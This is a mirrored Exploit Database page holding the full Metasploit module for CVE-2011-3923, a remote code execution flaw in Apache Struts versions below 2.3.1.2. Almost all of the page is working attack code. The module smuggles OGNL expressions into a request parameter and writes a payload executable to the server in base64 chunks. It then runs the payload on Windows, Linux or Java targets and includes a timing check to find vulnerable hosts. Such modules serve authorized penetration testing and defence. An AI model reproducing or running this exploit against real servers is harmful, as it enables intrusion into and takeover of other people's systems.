Apache Struts – ‘ParametersInterceptor’ Remote Code Execution (Metasploit)

• Exploit Database
• 9 阅读

• 作者： Metasploit
  日期： 2013-03-22
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/24874/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',
  'Description'=> %q{
  This module exploits a remote command execution vulnerability in Apache Struts
  versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows
  for the use of parentheses which in turn allows it to interpret parameter values as
  OGNL expressions during certain exception handling for mismatched data types of
  properties which allows remote attackers to execute arbitrary Java code via a
  crafted parameter.
  },
  'Author' =>
  [
  'Meder Kydyraliev', # Vulnerability Discovery and PoC
  'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module
  'mihi' #ARCH_JAVA support
  ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  [ 'CVE', '2011-3923'],
  [ 'OSVDB', '78501'],
  [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],
  [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']
  ],
  'Platform'=> [ 'win', 'linux', 'java'],
  'Privileged' => true,
  'Targets'=>
  [
  ['Windows Universal',
  {
  'Arch' => ARCH_X86,
  'Platform' => 'windows'
  }
  ],
  ['Linux Universal',
  {
  'Arch' => ARCH_X86,
  'Platform' => 'linux'
  }
  ],
  [ 'Java Universal',
  {
  'Arch' => ARCH_JAVA,
  'Platform' => 'java'
  },
  ]
  ],
  'DisclosureDate' => 'Oct 01 2011',
  'DefaultTarget' => 2))
  
  register_options(
  [
  Opt::RPORT(8080),
  OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),
  OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),
  OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])
  ], self.class)
  end
  
  def execute_command(cmd, opts = {})
  inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"
  inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"
  inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))
  inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))
  uri = String.new(datastore['TARGETURI'])
  uri = normalize_uri(uri)
  uri.gsub!(/INJECT/,inject) # append the injection string
  resp = send_request_cgi({
  'uri' => uri,
  'version' => '1.1',
  'method'=> 'GET',
  })
  return resp #Used for check function.
  end
  
  def exploit
  #Set up generic values.
  @payload_exe = rand_text_alphanumeric(4+rand(4))
  pl_exe = generate_payload_exe
  append = 'false'
  #Now arch specific...
  case target['Platform']
  when 'linux'
  @payload_exe = "/tmp/#{@payload_exe}"
  chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"
  exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"
  when 'java'
  @payload_exe << ".jar"
  pl_exe = payload.encoded_jar.pack
  exec_cmd = ""
  exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
  exec_cmd << "#q.setAccessible(true),#q.set(null,true),"
  exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"
  exec_cmd << "#q.setAccessible(true),#q.set(null,false),"
  exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"
  exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"
  exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
  exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
  when 'windows'
  @payload_exe = "./#{@payload_exe}.exe"
  exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"
  else
  fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')
  end
  
  #Now with all the arch specific stuff set, perform the upload.
  #109 = length of command string plus the max length of append.
  sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length
  chunk_length = 2048 - sub_from_chunk
  chunk_length = ((chunk_length/4).floor)*3
  while pl_exe.length > chunk_length
  java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)
  pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]
  append = true
  end
  java_upload_part(pl_exe,@payload_exe,append)
  execute_command(chmod_cmd) if target['Platform'] == 'linux'
  execute_command(exec_cmd)
  register_files_for_cleanup(@payload_exe)
  end
  
  def java_upload_part(part, filename, append = 'false')
  cmd = ""
  cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"
  cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"
  cmd << "#f.close()"
  execute_command(cmd)
  end
  
  def check
  sleep_time = datastore['CHECK_SLEEPTIME']
  check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"
  t1 = Time.now
  print_status("Asking remote server to sleep for #{sleep_time} seconds")
  response = execute_command(check_cmd)
  t2 = Time.now
  delta = t2 - t1
  
  
  if response.nil?
  return Exploit::CheckCode::Safe
  elsif delta < sleep_time
  return Exploit::CheckCode::Safe
  else
  return Exploit::CheckCode::Appears
  end
  end
  
  end